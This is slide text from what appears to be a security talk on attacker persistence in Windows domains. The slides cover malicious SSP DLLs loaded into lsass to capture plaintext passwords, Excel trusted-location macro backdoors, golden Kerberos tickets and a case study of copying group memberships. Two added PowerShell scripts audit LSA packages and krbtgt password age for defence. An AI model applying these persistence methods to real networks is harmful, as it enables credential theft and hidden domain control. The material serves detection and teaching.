◉ A Security Support Provider (SSP) - a security package
○ An extension used to perform authentication during a client/server exchange
◉ An Authentication Package (AP)
○ Extends interactive logon authentication
○ Example: RSA tokens
Security Support Provider
◉ SSP/AP
○ Can serve the tasks of both SSPs and APs - loaded into lsass at boot
○ Example: Kerberos and msv1_0 (NTLM)
Security Support Provider
◉ Install your own SSP that is loaded into lsass.exe
◉ Can develop your own SSP DLL
◉ Use the Persistence module in PowerSploit to install your malicious SSP
Security Support Provider
◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll
○ Once installed and loaded into lsass.exe, it captures plaintext passwords
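A check for the boot-time SSP/AP registration these slides describe, as an added example (not code from the talk, PowerSploit or mimikatz): it reads the LSA registry lists that decide which package DLLs lsass.exe loads at boot, resolves each name to its DLL, and verifies that the file exists and carries a valid Microsoft signature. A name you did not expect (mimilib, for instance) or an unsigned DLL is what a persistent rogue SSP looks like. `$ExpectedPackages` is an optional allow list you capture from a clean build; with it empty, every entry is listed for review.

```powershell
# Added example, not code from the talk: audit the LSA package lists that lsass.exe loads at boot.
# $ExpectedPackages is an optional allow list captured from a clean build.
param([string[]]$ExpectedPackages = @())

$locations = @(
    @{ Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';          Value = 'Security Packages' },
    @{ Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'; Value = 'Security Packages' },
    @{ Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';          Value = 'Authentication Packages' }
)

function Get-LsaPackages {
    foreach ($loc in $locations) {
        $raw = (Get-ItemProperty -Path $loc.Key -Name $loc.Value -ErrorAction SilentlyContinue).($loc.Value)
        foreach ($entry in @($raw)) {
            $name = ([string]$entry).Trim()
            if (-not $name) { continue }        # REG_MULTI_SZ lists may carry an empty entry
            # Entries are normally bare names resolved from System32; a path or .dll suffix is honoured if present.
            $file = if ($name -like '*.dll') { $name } else { "$name.dll" }
            $dll  = if ($file -match '\\') { [Environment]::ExpandEnvironmentVariables($file) }
                    else { Join-Path $env:SystemRoot "System32\$file" }
            $exists = Test-Path -LiteralPath $dll
            # Catalog-signed Microsoft DLLs report Valid on Windows 8+; older builds may report NotSigned.
            $sig = if ($exists) { Get-AuthenticodeSignature -FilePath $dll } else { $null }
            [pscustomobject]@{
                Source    = "$($loc.Key)\$($loc.Value)"
                Package   = $name
                Dll       = $dll
                Exists    = $exists
                SigStatus = if ($sig) { [string]$sig.Status } else { 'n/a' }
                Signer    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
                Expected  = ($ExpectedPackages.Count -eq 0) -or ($ExpectedPackages -contains $name)
            }
        }
    }
}

$packages = @(Get-LsaPackages)
$packages | Format-Table Source, Package, Exists, SigStatus, Expected -AutoSize

"Entries that need a look (missing file, signature not valid, signer not Microsoft, or not in the allow list):"
$packages | Where-Object {
    -not $_.Exists -or $_.SigStatus -ne 'Valid' -or $_.Signer -notmatch 'Microsoft' -or -not $_.Expected
} | Format-List Source, Package, Dll, SigStatus, Signer
```

This only sees packages registered to load at boot, which is the persistence case the slides cover; comparing the modules actually loaded in the running lsass.exe process against the same allow list closes the gap for a package added to the live process.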
Excel Magic
◉ Malicious macro executes backdoor
◉ How can you ensure persistence?
○ Most users will run Excel once a day
○ You can use any “old school” technique to spawn Excel
○ Disable macro security settings to run the macro without a user prompt
Excel Magic
◉ Registry modification that opens a specific workbook upon starting Excel
○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\Trusted Locations
○ Just add the location
Additional Persistence Opportunities
Golden Tickets
◉ Method was developed with Ben Delpy and Sean Metcalf
◉ Forges a “golden” Kerberos ticket which can be good for 10 years!
◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain
Golden Tickets
◉ Only need four pieces of information
○ Domain SID
○ Name of the domain
○ User you want to create a ticket for
○ krbtgt account hash
◉ You can build your ticket at home, offline
Golden Ticket Takeaways
◉ If impersonating an account, tickets are still valid even if password changes
◉ Valid for as long as you specify (10 year default)
◉ Domain trusts
○ Child domains can compromise the parent
◉ The only way to stop it is to change the krbtgt hash… twice…
◉ Or rebuild from bare metal
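Since the only remediation named above is resetting krbtgt (twice), the obvious hygiene metric is how old each krbtgt password is. As an added example (not code from the talk), this reports that age for every domain in the forest, including child domains, which the trust bullet above makes relevant. It requires the RSAT ActiveDirectory module and read access to each domain; `$MaxAgeDays` is an assumption.

```powershell
# Added example, not code from the talk: report krbtgt password age per forest domain.
# Requires the RSAT ActiveDirectory module. $MaxAgeDays is an assumption.
param([int]$MaxAgeDays = 180)
Import-Module ActiveDirectory

function Get-KrbtgtAge {
    param([int]$MaxAge)
    foreach ($domain in (Get-ADForest).Domains) {
        try {
            $k = Get-ADUser -Identity krbtgt -Server $domain -Properties PasswordLastSet
        } catch {
            # Unreachable or unreadable domain: report it rather than silently skipping it.
            [pscustomobject]@{ Domain = $domain; PasswordLastSet = $null; AgeDays = $null; Overdue = $null; Error = $_.Exception.Message }
            continue
        }
        $ageDays = [int]((Get-Date) - $k.PasswordLastSet).TotalDays
        [pscustomobject]@{
            Domain          = $domain
            PasswordLastSet = $k.PasswordLastSet
            AgeDays         = $ageDays
            Overdue         = ($ageDays -gt $MaxAge)
            Error           = ''
        }
    }
}

Get-KrbtgtAge -MaxAge $MaxAgeDays | Format-Table -AutoSize
```

A recent `PasswordLastSet` is necessary but not sufficient: as the slides say, the reset has to happen twice, and a single reset leaves tickets forged with the previous hash valid.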
Account Checkout - Case Study
◉ Client had account checkout system for domain administrator accounts
◉ Only two users with access to the checkout system
◉ System requires 2FA
◉ DA access is lost if the user changes their password/PIN/token
◉ Users can see checked-out accounts
Account Checkout - Case Study
◉ Persist domain administrator without getting caught
○ Can’t continuously check out accounts
◉ Password vault permissions were managed through Active Directory groups
○ Tons of them
Account Checkout - Case Study
◉ Copy group memberships to a compromised user account
○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed without needing access to their Password Vault
Conclusions
Conclusions
◉ Persistence will remain rampant
◉ There are always new and creative ways to maintain persistence
◉ Understanding persistence techniques is critical to detecting attacker access